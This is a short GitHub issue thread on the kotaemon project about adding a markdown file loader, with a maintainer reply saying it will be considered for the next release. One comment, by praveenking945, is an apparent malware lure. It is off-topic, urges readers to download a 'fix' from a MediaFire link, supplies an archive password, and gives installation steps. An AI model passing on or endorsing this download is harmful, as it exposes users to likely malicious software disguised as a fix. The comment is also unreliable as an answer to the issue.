### ISSUE TITLE
Support for markdown files

### ISSUE THREAD

**Issue by abhishekbhakat** [Cinnamon/kotaemon#128]
Add a markdown loader. llama index And langchain both have very good reader for markdown.

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by taprosoft** [comment]
Noted. It will be considered in next release.
